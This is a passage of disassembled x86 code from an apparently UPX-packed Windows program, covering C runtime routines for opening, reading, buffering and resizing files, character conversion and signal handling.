call sub_41E68E
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_422561
; ---------------------------------------------------------------------------
loc_42236A: ; CODE XREF: sub_4222C9+85�j
mov [ebp+var_8], ebx
jmp short loc_422384
; ---------------------------------------------------------------------------
loc_42236F: ; CODE XREF: sub_4222C9+80�j
mov [ebp+var_8], 2
jmp short loc_422384
; ---------------------------------------------------------------------------
loc_422378: ; CODE XREF: sub_4222C9+7B�j
mov [ebp+var_8], 1
jmp short loc_422384
; ---------------------------------------------------------------------------
loc_422381: ; CODE XREF: sub_4222C9+76�j
mov [ebp+var_8], esi
loc_422384: ; CODE XREF: sub_4222C9+A4�j
; sub_4222C9+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_4223CB
jz short loc_4223C6
cmp eax, esi
jz short loc_4223C6
cmp eax, edi
jz short loc_4223BD
cmp eax, 200h
jz short loc_4223F7
cmp eax, 300h
jnz short loc_4223DD
mov [ebp+var_C], 2
jmp short loc_422407
; ---------------------------------------------------------------------------
loc_4223BD: ; CODE XREF: sub_4222C9+DB�j
mov [ebp+var_C], 4
jmp short loc_422407
; ---------------------------------------------------------------------------
loc_4223C6: ; CODE XREF: sub_4222C9+D3�j
; sub_4222C9+D7�j
mov [ebp+var_C], ebx
jmp short loc_422407
; ---------------------------------------------------------------------------
loc_4223CB: ; CODE XREF: sub_4222C9+D1�j
cmp eax, 500h
jz short loc_422400
cmp eax, 600h
jz short loc_4223F7
cmp eax, edx
jz short loc_422400
loc_4223DD: ; CODE XREF: sub_4222C9+E9�j
call sub_41E685
mov dword ptr [eax], 16h
call sub_41E68E
mov [eax], esi
loc_4223EF: ; CODE XREF: sub_4222C9+2E2�j
or eax, 0FFFFFFFFh
jmp loc_422560
; ---------------------------------------------------------------------------
loc_4223F7: ; CODE XREF: sub_4222C9+E2�j
; sub_4222C9+10E�j
mov [ebp+var_C], 5
jmp short loc_422407
; ---------------------------------------------------------------------------
loc_422400: ; CODE XREF: sub_4222C9+107�j
; sub_4222C9+112�j
mov [ebp+var_C], 1
loc_422407: ; CODE XREF: sub_4222C9+F2�j
; sub_4222C9+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_422425
mov ecx, dword_44C044
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_422425
xor esi, esi
inc esi
loc_422425: ; CODE XREF: sub_4222C9+148�j
; sub_4222C9+157�j
test al, 40h
jz short loc_422440
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_44C048, 2
jnz short loc_422440
or [ebp+var_8], 4
loc_422440: ; CODE XREF: sub_4222C9+15E�j
; sub_4222C9+171�j
test ah, 10h
jz short loc_422447
or esi, edi
loc_422447: ; CODE XREF: sub_4222C9+17A�j
test al, 20h
jz short loc_422453
or esi, 8000000h
jmp short loc_42245D
; ---------------------------------------------------------------------------
loc_422453: ; CODE XREF: sub_4222C9+180�j
test al, 10h
jz short loc_42245D
or esi, 10000000h
loc_42245D: ; CODE XREF: sub_4222C9+188�j
; sub_4222C9+18C�j
call sub_42200E
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_422485
call sub_41E685
mov dword ptr [eax], 18h
call sub_41E68E
and dword ptr [eax], 0
loc_42247E: ; CODE XREF: sub_4222C9+208�j
mov eax, ebx
jmp loc_422560
; ---------------------------------------------------------------------------
loc_422485: ; CODE XREF: sub_4222C9+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call dword_424074 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_4224C4
push esi
call dword_42404C ; GetFileType
test eax, eax
jnz short loc_4224D3
push esi
call dword_42406C ; CloseHandle
loc_4224C4: ; CODE XREF: sub_4222C9+1E7�j
call dword_42412C ; RtlGetLastWin32Error
push eax
call sub_41E697
pop ecx
jmp short loc_42247E
; ---------------------------------------------------------------------------
loc_4224D3: ; CODE XREF: sub_4222C9+1F2�j
cmp eax, 2
jnz short loc_4224DE
or [ebp+var_1], 40h
jmp short loc_4224E7
; ---------------------------------------------------------------------------
loc_4224DE: ; CODE XREF: sub_4222C9+20D�j
cmp eax, 3
jnz short loc_4224E7
or [ebp+var_1], 8
loc_4224E7: ; CODE XREF: sub_4222C9+213�j
; sub_4222C9+218�j
push esi
push edi
call sub_421E10
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:47C640h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_422549
test al, al
jns short loc_422549
test byte ptr [ebp+arg_C], 2
jz short loc_422549
push 2
push 0FFFFFFFFh
push edi
call sub_421AC1
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_422565
call sub_41E68E
cmp dword ptr [eax], 83h
jnz short loc_4225A4
loc_422549: ; CODE XREF: sub_4222C9+252�j
; sub_4222C9+256�j ...
cmp [ebp+var_1], 0
jnz short loc_42255E
test byte ptr [ebp+arg_C], 8
jz short loc_42255E
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_42255E: ; CODE XREF: sub_4222C9+284�j
; sub_4222C9+28A�j
mov eax, edi
loc_422560: ; CODE XREF: sub_4222C9+129�j
; sub_4222C9+1B7�j
pop edi
loc_422561: ; CODE XREF: sub_4222C9+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_422565: ; CODE XREF: sub_4222C9+271�j
push 1
lea eax, [ebp+var_2]
push eax
push edi
mov [ebp+var_2], 0
call sub_422B72
add esp, 0Ch
test eax, eax
jnz short loc_422592
cmp [ebp+var_2], 1Ah
jnz short loc_422592
push [ebp+var_10]
push edi
call sub_422A31
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_4225A4
loc_422592: ; CODE XREF: sub_4222C9+2B1�j
; sub_4222C9+2B7�j
push 0
push 0
push edi
call sub_421AC1
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_422549
loc_4225A4: ; CODE XREF: sub_4222C9+27E�j
; sub_4222C9+2C7�j
push edi
call sub_41DCA6
pop ecx
jmp loc_4223EF
sub_4222C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4225B0 proc near ; CODE XREF: sub_41E51D+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_4260C8
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_4222C9
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4225F5
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_4225B0 endp
; =============== S U B R O U T I N E =======================================
sub_4225F5 proc near ; CODE XREF: sub_4225B0+37�p
; DATA XREF: UPX0:stru_4260C8�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_422604
push dword ptr [ebp-20h]
call sub_421FEC
pop ecx
locret_422604: ; CODE XREF: sub_4225F5+4�j
retn
sub_4225F5 endp
; =============== S U B R O U T I N E =======================================
sub_422605 proc near ; CODE XREF: sub_41ED18+F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_4226E1
test al, 40h
jnz loc_4226E1
test al, 2
jz short loc_42262C
or eax, 20h
mov [esi+0Ch], eax
jmp loc_4226E1
; ---------------------------------------------------------------------------
loc_42262C: ; CODE XREF: sub_422605+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_422641
push esi
call sub_421BE0
pop ecx
jmp short loc_422646
; ---------------------------------------------------------------------------
loc_422641: ; CODE XREF: sub_422605+31�j
mov eax, [esi+8]
mov [esi], eax
loc_422646: ; CODE XREF: sub_422605+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_422D4D
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_4226D0
cmp eax, 0FFFFFFFFh
jz short loc_4226D0
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_4226A5
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_42268B
mov edi, ecx
sar edi, 5
mov edi, ds:dword_47C640[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_422690
; ---------------------------------------------------------------------------
loc_42268B: ; CODE XREF: sub_422605+6D�j
mov edi, offset dword_42AAE0
loc_422690: ; CODE XREF: sub_422605+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_4226A5
or edx, 2000h
mov [esi+0Ch], edx
loc_4226A5: ; CODE XREF: sub_422605+64�j
; sub_422605+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_4226C2
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_4226C2
test ch, 4
jnz short loc_4226C2
mov dword ptr [esi+18h], 1000h
loc_4226C2: ; CODE XREF: sub_422605+A7�j
; sub_422605+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4226D0: ; CODE XREF: sub_422605+57�j
; sub_422605+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_4226E1: ; CODE XREF: sub_422605+A�j
; sub_422605+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_422605 endp
; =============== S U B R O U T I N E =======================================
sub_4226E6 proc near ; CODE XREF: sub_41ED2E+88�p
; sub_41ED2E+4F8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_422732
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_422704
test al, al
jns short loc_422732
test al, 2
jnz short loc_422732
loc_422704: ; CODE XREF: sub_4226E6+14�j
cmp dword ptr [esi+8], 0
jnz short loc_422711
push esi
call sub_421BE0
pop ecx
loc_422711: ; CODE XREF: sub_4226E6+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_422721
cmp dword ptr [esi+4], 0
jnz short loc_422732
inc eax
mov [esi], eax
loc_422721: ; CODE XREF: sub_4226E6+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_422738
cmp [eax], bl
jz short loc_42273A
inc eax
mov [esi], eax
loc_422732: ; CODE XREF: sub_4226E6+9�j
; sub_4226E6+18�j ...
or eax, 0FFFFFFFFh
loc_422735: ; CODE XREF: sub_4226E6+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_422738: ; CODE XREF: sub_4226E6+43�j
mov [eax], bl
loc_42273A: ; CODE XREF: sub_4226E6+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_422735
sub_4226E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422752 proc near ; CODE XREF: sub_422812+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_422776
cmp [ebp+arg_C], ebx
jz short loc_422776
mov al, [edi]
cmp al, bl
jnz short loc_42277D
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_422776
mov [eax], bx
loc_422776: ; CODE XREF: sub_422752+D�j
; sub_422752+12�j ...
xor eax, eax
loc_422778: ; CODE XREF: sub_422752+44�j
; sub_422752+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42277D: ; CODE XREF: sub_422752+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_422798
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_422793
movzx ax, al
mov [ecx], ax
loc_422793: ; CODE XREF: sub_422752+38�j
; sub_422752+AB�j
xor eax, eax
inc eax
jmp short loc_422778
; ---------------------------------------------------------------------------
loc_422798: ; CODE XREF: sub_422752+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4227E1
mov eax, [esi+28h]
cmp eax, 1
jle short loc_4227CF
cmp [ebp+arg_C], eax
jl short loc_4227CF
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call dword_4240FC ; MultiByteToWideChar
test eax, eax
jnz short loc_4227DC
loc_4227CF: ; CODE XREF: sub_422752+59�j
; sub_422752+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_4227FF
cmp [edi+1], bl
jz short loc_4227FF
loc_4227DC: ; CODE XREF: sub_422752+7B�j
mov eax, [esi+28h]
jmp short loc_422778
; ---------------------------------------------------------------------------
loc_4227E1: ; CODE XREF: sub_422752+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call dword_4240FC ; MultiByteToWideChar
test eax, eax
jnz short loc_422793
loc_4227FF: ; CODE XREF: sub_422752+83�j
; sub_422752+88�j
call sub_41E685
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_422778
sub_422752 endp
; =============== S U B R O U T I N E =======================================
sub_422812 proc near ; CODE XREF: sub_41ED2E+829�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_422827
call sub_41B2CF
loc_422827: ; CODE XREF: sub_422812+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_422752
add esp, 10h
retn
sub_422812 endp
; =============== S U B R O U T I N E =======================================
sub_42283D proc near ; CODE XREF: sub_422870+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_47C401[eax], cl
jnz short loc_42286C
cmp [esp+arg_4], 0
jz short loc_422865
mov ecx, off_42AB04
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+arg_4]
jmp short loc_422867
; ---------------------------------------------------------------------------
loc_422865: ; CODE XREF: sub_42283D+16�j
xor eax, eax
loc_422867: ; CODE XREF: sub_42283D+26�j
test eax, eax
jnz short loc_42286C
retn
; ---------------------------------------------------------------------------
loc_42286C: ; CODE XREF: sub_42283D+F�j
; sub_42283D+2C�j
xor eax, eax
inc eax
retn
sub_42283D endp
; =============== S U B R O U T I N E =======================================
sub_422870 proc near ; CODE XREF: sub_41FE4F+3F�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_42283D
add esp, 0Ch
retn
sub_422870 endp
; =============== S U B R O U T I N E =======================================
sub_422881 proc near ; CODE XREF: sub_4228AF+72�p
mov ecx, dword_42AADC
mov eax, edx
push edi
loc_42288A: ; CODE XREF: sub_422881+19�j
cmp [eax+4], esi
jz short loc_42289C
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_42288A
loc_42289C: ; CODE XREF: sub_422881+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_4228AC
cmp [eax+4], esi
jz short locret_4228AE
loc_4228AC: ; CODE XREF: sub_422881+24�j
xor eax, eax
locret_4228AE: ; CODE XREF: sub_422881+29�j
retn
sub_422881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228AF proc near ; CODE XREF: sub_41BE81+5A25�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004229F7 SIZE 00000031 BYTES
push 20h
push offset stru_426118
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_422931
dec eax
dec eax
jz short loc_422911
sub eax, 4
jz short loc_422911
sub eax, 3
jz short loc_422911
sub eax, 4
jz short loc_422904
sub eax, 6
jz short loc_4228F7
dec eax
jz short loc_4228EA
or eax, 0FFFFFFFFh
jmp loc_422A22
; ---------------------------------------------------------------------------
loc_4228EA: ; CODE XREF: sub_4228AF+31�j
mov esi, offset dword_44C360
mov edi, dword_44C360
jmp short loc_42293C
; ---------------------------------------------------------------------------
loc_4228F7: ; CODE XREF: sub_4228AF+2E�j
mov esi, offset dword_44C35C
mov edi, dword_44C35C
jmp short loc_42293C
; ---------------------------------------------------------------------------
loc_422904: ; CODE XREF: sub_4228AF+29�j
mov esi, offset dword_44C364
mov edi, dword_44C364
jmp short loc_42293C
; ---------------------------------------------------------------------------
loc_422911: ; CODE XREF: sub_4228AF+1A�j
; sub_4228AF+1F�j ...
call sub_41B330
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_422881
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_422946
; ---------------------------------------------------------------------------
loc_422931: ; CODE XREF: sub_4228AF+16�j
mov esi, offset dword_44C358
mov edi, dword_44C358
loc_42293C: ; CODE XREF: sub_4228AF+46�j
; sub_4228AF+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_422946: ; CODE XREF: sub_4228AF+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_422A20
cmp edi, ecx
jnz short loc_42295D
push 3
call sub_41EB71
loc_42295D: ; CODE XREF: sub_4228AF+A5�j
cmp [ebp+var_1C], ecx
jz short loc_42296B
push ecx
call sub_41D0E7
pop ecx
xor ecx, ecx
loc_42296B: ; CODE XREF: sub_4228AF+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_422980
cmp eax, 0Bh
jz short loc_422980
cmp eax, 4
jnz short loc_42299B
loc_422980: ; CODE XREF: sub_4228AF+C5�j
; sub_4228AF+CA�j
mov edx, [ebx+58h]
mov [ebp+var_2C], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_4229C7
mov edx, [ebx+5Ch]
mov [ebp+var_30], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_42299B: ; CODE XREF: sub_4228AF+CF�j
cmp eax, 8
jnz short loc_4229C7
mov eax, dword_42AAD0
loc_4229A5: ; CODE XREF: sub_4228AF+116�j
mov [ebp+var_28], eax
mov edx, dword_42AAD4
mov esi, dword_42AAD0
add edx, esi
cmp eax, edx
jge short loc_4229C9
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_4229A5
; ---------------------------------------------------------------------------
loc_4229C7: ; CODE XREF: sub_4228AF+DD�j
; sub_4228AF+EF�j
mov [esi], ecx
loc_4229C9: ; CODE XREF: sub_4228AF+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4229EA
cmp [ebp+arg_0], 8
jnz short loc_4229F7
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_4229FC
sub_4228AF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4229E2 proc near ; DATA XREF: UPX0:stru_426118�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_4229E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4229EA proc near ; CODE XREF: sub_4228AF+11E�p
cmp [ebp-1Ch], ecx
jz short locret_4229F6
push ecx
call sub_41D032
pop ecx
locret_4229F6: ; CODE XREF: sub_4229EA+3�j
retn
sub_4229EA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228AF
loc_4229F7: ; CODE XREF: sub_4228AF+127�j
push [ebp+arg_0]
call edi
loc_4229FC: ; CODE XREF: sub_4228AF+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_422A0F
cmp eax, 0Bh
jz short loc_422A0F
cmp eax, 4
jnz short loc_422A20
loc_422A0F: ; CODE XREF: sub_4228AF+154�j
; sub_4228AF+159�j
mov ecx, [ebp+var_2C]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_422A20
mov eax, [ebp+var_30]
mov [ebx+5Ch], eax
loc_422A20: ; CODE XREF: sub_4228AF+9D�j
; sub_4228AF+15E�j ...
xor eax, eax
loc_422A22: ; CODE XREF: sub_4228AF+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_4228AF
; =============== S U B R O U T I N E =======================================
sub_422A28 proc near ; CODE XREF: sub_41C6EE+476�p
; sub_41C6EE+491�p ...
push 2
call sub_41A4AE
pop ecx
retn
sub_422A28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A31 proc near ; CODE XREF: sub_4222C9+2BD�p
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_4192D0
mov eax, dword_42A290
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_421AC1
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_1008], eax
jz loc_422B64
push 2
push esi
push [ebp+arg_0]
call sub_421AC1
add esp, 0Ch
cmp eax, ebx
jz loc_422B64
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_422B04
mov ebx, 1000h
push ebx
lea eax, [ebp+var_1004]
push esi
push eax
call sub_420CC0
push 8000h
push [ebp+arg_0]
call sub_422E61
add esp, 14h
mov [ebp+var_100C], eax
loc_422AB2: ; CODE XREF: sub_422A31+A5�j
cmp edi, ebx
mov eax, ebx
jge short loc_422ABA
mov eax, edi
loc_422ABA: ; CODE XREF: sub_422A31+85�j
push eax
lea eax, [ebp+var_1004]
push eax
push [ebp+arg_0]
call sub_41DF58
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_422ADA
sub edi, eax
test edi, edi
jg short loc_422AB2
jmp short loc_422AF2
; ---------------------------------------------------------------------------
loc_422ADA: ; CODE XREF: sub_422A31+9F�j
call sub_41E68E
cmp dword ptr [eax], 5
jnz short loc_422AEF
call sub_41E685
mov dword ptr [eax], 0Dh
loc_422AEF: ; CODE XREF: sub_422A31+B1�j
or esi, 0FFFFFFFFh
loc_422AF2: ; CODE XREF: sub_422A31+A7�j
push [ebp+var_100C]
push [ebp+arg_0]
call sub_422E61
pop ecx
pop ecx
jmp short loc_422B4C
; ---------------------------------------------------------------------------
loc_422B04: ; CODE XREF: sub_422A31+56�j
jge short loc_422B4C
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421AC1
push [ebp+arg_0]
call sub_421F0B
add esp, 10h
push eax
call dword_424174 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_422B4C
call sub_41E685
mov dword ptr [eax], 0Dh
call sub_41E68E
mov edi, eax
call dword_42412C ; RtlGetLastWin32Error
mov [edi], eax
loc_422B4C: ; CODE XREF: sub_422A31+D1�j
; sub_422A31:loc_422B04�j ...
push 0
push [ebp+var_1008]
push [ebp+arg_0]
call sub_421AC1
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_422B66
; ---------------------------------------------------------------------------
loc_422B64: ; CODE XREF: sub_422A31+32�j
; sub_422A31+48�j
mov eax, ebx
loc_422B66: ; CODE XREF: sub_422A31+131�j
mov ecx, [ebp+var_4]
pop esi
pop ebx
call sub_4192B6
leave
retn
sub_422A31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422B72 proc near ; CODE XREF: sub_4222C9+2A7�p
; sub_422D4D+52�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_422D46
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:47C640h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_422D46
test cl, 48h
jz short loc_422BDD
cmp byte ptr [eax+5], 0Ah
jz short loc_422BDD
mov eax, [edi]
mov al, [eax+esi+5]
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_422BDD: ; CODE XREF: sub_422B72+47�j
; sub_422B72+4D�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call dword_424070 ; ReadFile
test eax, eax
jnz short loc_422C2F
call dword_42412C ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_422C17
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
mov [eax], esi
jmp short loc_422C27
; ---------------------------------------------------------------------------
loc_422C17: ; CODE XREF: sub_422B72+8F�j
cmp eax, 6Dh
jz loc_422D46
push eax
call sub_41E697
pop ecx
loc_422C27: ; CODE XREF: sub_422B72+A3�j
or eax, 0FFFFFFFFh
jmp loc_422D48
; ---------------------------------------------------------------------------
loc_422C2F: ; CODE XREF: sub_422B72+82�j
mov eax, [ebp+var_C]
mov ecx, [edi]
add [ebp+var_8], eax
test byte ptr [ecx+esi+4], 80h
jz loc_422D41
test eax, eax
jz short loc_422C56
cmp byte ptr [ebx], 0Ah
jnz short loc_422C56
mov eax, ecx
lea eax, [eax+esi+4]
or byte ptr [eax], 4
jmp short loc_422C5F
; ---------------------------------------------------------------------------
loc_422C56: ; CODE XREF: sub_422B72+D2�j
; sub_422B72+D7�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FBh
loc_422C5F: ; CODE XREF: sub_422B72+E2�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_422D3B
loc_422C75: ; CODE XREF: sub_422B72+1B1�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_422D2B
cmp al, 0Dh
jz short loc_422C91
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_422D1D
; ---------------------------------------------------------------------------
loc_422C91: ; CODE XREF: sub_422B72+112�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_422CAB
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_422CA6
add [ebp+arg_8], 2
jmp short loc_422CFF
; ---------------------------------------------------------------------------
loc_422CA6: ; CODE XREF: sub_422B72+12C�j
mov [ebp+arg_8], eax
jmp short loc_422D19
; ---------------------------------------------------------------------------
loc_422CAB: ; CODE XREF: sub_422B72+123�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_424070 ; ReadFile
test eax, eax
jnz short loc_422CD3
call dword_42412C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_422D19
loc_422CD3: ; CODE XREF: sub_422B72+155�j
cmp [ebp+var_C], 0
jz short loc_422D19
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_422CF4
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_422CFF
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_422D1C
; ---------------------------------------------------------------------------
loc_422CF4: ; CODE XREF: sub_422B72+16E�j
cmp ebx, [ebp+arg_4]
jnz short loc_422D04
cmp [ebp+var_1], 0Ah
jnz short loc_422D04
loc_422CFF: ; CODE XREF: sub_422B72+132�j
; sub_422B72+175�j
mov byte ptr [ebx], 0Ah
jmp short loc_422D1C
; ---------------------------------------------------------------------------
loc_422D04: ; CODE XREF: sub_422B72+185�j
